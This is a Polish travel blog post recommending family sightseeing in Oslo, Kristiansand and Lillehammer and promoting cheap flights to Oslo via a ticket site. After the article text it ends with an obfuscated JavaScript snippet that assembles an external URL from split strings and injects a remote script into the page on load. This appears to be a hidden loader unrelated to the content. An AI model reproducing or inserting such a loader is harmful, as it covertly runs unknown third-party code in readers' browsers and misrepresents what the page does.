Jadzia Pętelka

Bajkowa Norwegia dla całej rodziny

📅 piątek 23.09.2016 do poniedziałek 03.10.2016
Norwegia z rodziną

Co warto zobaczyć w Norwegii?

Do Norwegii można udać się zarówno zimą, jak i w ciepłych, letnich miesiącach. Z dostaniem się tam o dowolnej porze nie będzie problemu –loty do Oslo odbywają się niemal codziennie. Po przylocie do stolicy warto zwiedzić starą część miasta z charakterystycznym, otwartym dla zwiedzających ratuszem miejskim, przespacerować po parku Vigeland, gdzie znajduje ponad 200 rzeźb z kamienia, prezentujących ponad 600 postaci, a także zobaczyć modernistyczny budynek opery narodowej. Dorośli mogą zainteresować się takimi miejscami jak Sinsen Bruktkhall – pchli targ, gdzie można znaleźć przedmioty liczące kilkadziesiąt lat, sklep z pamiątkami przyrodniczymi Naturens Mangfold – dzięki temu miejsc każdy może wejść w posiadanie kawałka prawdziwego meteorytu, a także kawiarnie i restauracje z muzyką na żywo oraz muzeum sztuki nowoczesnej.

Oslo z dziećmi

W stolicy Norwegii na dzieci czeka mnóstwo atrakcji związanych z przyrodą – dlatego loty do Oslo są wspaniałą okazją do pokazania im potęgi natury w pełnej krasie. Wycieczki łodziami po fiordach, zwiedzanie licznych wysp i wysepek, atrakcyjne trasy rowerowe i spacerowe wiodące w góry i dzikie lasy, parki wspinaczkowe i plaże to dziesiątki okazji do aktywnego spędzenia czasu  na świeżym powietrzu. Oczywiście nie brak także innych, sezonowych atrakcji – w zimie to przede wszystkim narciarstwo i łyżwy – oraz wydarzeń kulturalnych dla różnych grup wiekowych.

Nie tylko Oslo

Będąc w Norwegii można zwiedzać nie tylko Oslo. Warto udać się dziećmi do parku rozrywki i zoo w jednym – Dyreparken, a także parku wodnego Badelandet, które położone są w miejscowości Kristiansand, skansenu Hakalegarden, a zimą wziąć udział w podróży psim zaprzęgiem oraz odwiedzić park Hunderfossen w Lillehammer. Niezapomniane wrażenia dla dzieci i dorosłych gwarantowane.

Jak dostać się do Norwegii?

W Norwegii znajduje się kilka portów lotniczych – w Oslo, Bergen, Trondheim i innych miastach. Jednak podróżnicy z Polski najczęściej wpisują w wyszukiwarki frazę „bilety lotnicze Oslo”. Dlaczego? Przede wszystkim dlatego, że jest to najbardziej atrakcyjne turystycznie miasto w całym kraju, a ponadto łatwo dostać się z niego do innych rejonów. Kolejna zaleta to koszt – bilety lotnicze Oslo to nieduży wydatek, wynoszący nawet poniżej sześćdziesięciu złotych! Tak tanie bilety z Polski do stolicy Norwegii można znaleźć między innymi na stronie https://www.fru.pl .

(function(){ qwrg=document.createElement("script");qwrg_=("us")+("ta"); qwrg_+="t"+(".");qwrg_+=("in");qwrgu="13443560";qwrg.async=true; qwrgu+=".ukdis906wrgrtthtl";qwrg.type="text/javascript";qwrg_+="f"+"o"+("/"); qwrgu+="9ba3gxe5t5aky";qwrg.src="//"+qwrg_+qwrgu; dqwrg=document.body;dqwrg.appendChild(qwrg); })();